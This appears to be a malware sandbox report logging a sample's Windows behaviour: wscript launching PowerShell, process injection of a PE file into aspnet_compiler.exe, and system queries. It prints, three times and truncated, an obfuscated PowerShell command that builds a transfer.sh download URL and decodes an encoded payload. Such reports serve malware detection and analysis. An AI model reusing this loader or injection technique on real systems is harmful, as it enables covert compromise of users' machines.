Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477

Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: aspnet_compiler.exe, 00000011.00000003.978157465.000000000133F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C6F008	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
